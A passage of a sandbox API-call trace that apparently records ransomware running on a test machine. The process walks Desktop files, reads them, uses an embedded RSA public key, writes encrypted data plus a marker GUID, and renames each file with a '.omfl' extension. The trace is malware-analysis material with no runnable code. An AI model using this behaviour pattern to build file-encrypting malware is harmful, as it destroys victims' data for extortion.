[0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ba8 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b78 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16bc0 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b90 | out: hHeap=0x4970000) returned 1 [0130.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b90 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b90 | out: hHeap=0x4970000) returned 1 [0130.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.404] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.404] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bc0 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ba8 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b78 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c5028 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b60 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2e90 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.405] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.405] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0xcc72, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0xcc72, lpOverlapped=0x0) returned 1 [0130.428] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.428] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xcc77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.428] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.428] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.428] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.429] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.429] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.429] CloseHandle (hObject=0x5c8) returned 1 [0130.433] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d0EJm7uAME0kmSc8BPIa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d0ejm7uame0kmsc8bpia.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d0EJm7uAME0kmSc8BPIa.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d0ejm7uame0kmsc8bpia.png.omfl")) returned 1 [0130.434] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.434] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.434] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.435] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.435] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0130.435] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0130.435] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0130.436] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6954d480, ftCreationTime.dwHighDateTime=0x1d5d82e, ftLastAccessTime.dwLowDateTime=0xbce6b7d0, ftLastAccessTime.dwHighDateTime=0x1d5e247, ftLastWriteTime.dwLowDateTime=0xbce6b7d0, ftLastWriteTime.dwHighDateTime=0x1d5e247, nFileSizeHigh=0x0, nFileSizeLow=0x17fa6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dXhckZIDa-zouPBDDbOo.doc", cAlternateFileName="DXHCKZ~1.DOC")) returned 1 [0130.436] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXhckZIDa-zouPBDDbOo.doc") returned=".doc" [0130.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXhckZIDa-zouPBDDbOo.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dxhckzida-zoupbddboo.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.436] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=98214) returned 1 [0130.436] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.439] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x17f80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.439] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.440] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x17fa6, lpOverlapped=0x0) returned 1 [0130.441] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.441] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.441] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.441] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.442] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.442] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.442] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.442] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.442] GetLastError () returned 0x0 [0130.442] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.442] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.442] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.442] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.442] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.442] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.442] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.443] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.444] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x17fa6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.444] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.446] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.446] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.446] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.446] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.446] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.446] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.446] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.446] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.446] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.446] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.446] CloseHandle (hObject=0x5c8) returned 1 [0130.453] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.453] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x7516fe8 [0130.453] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.453] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXhckZIDa-zouPBDDbOo.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dxhckzida-zoupbddboo.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXhckZIDa-zouPBDDbOo.doc.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dxhckzida-zoupbddboo.doc.omfl")) returned 1 [0130.454] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.454] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.454] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.456] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.456] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdce404c0, ftCreationTime.dwHighDateTime=0x1d5e62f, ftLastAccessTime.dwLowDateTime=0xde10aeb0, ftLastAccessTime.dwHighDateTime=0x1d5ddfc, ftLastWriteTime.dwLowDateTime=0xde10aeb0, ftLastWriteTime.dwHighDateTime=0x1d5ddfc, nFileSizeHigh=0x0, nFileSizeLow=0x9eee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fy7wR6_Uk9zi rXA1gQ.doc", cAlternateFileName="FY7WR6~1.DOC")) returned 1 [0130.456] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.456] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.456] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.456] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fy7wR6_Uk9zi rXA1gQ.doc") returned=".doc" [0130.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fy7wR6_Uk9zi rXA1gQ.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fy7wr6_uk9zi rxa1gq.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.456] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=40686) returned 1 [0130.456] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.459] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x9ec8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.459] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.460] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.460] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x9eee, lpOverlapped=0x0) returned 1 [0130.460] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.460] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.461] lstrlenA (lpString="-----BEGIN PUBLIC 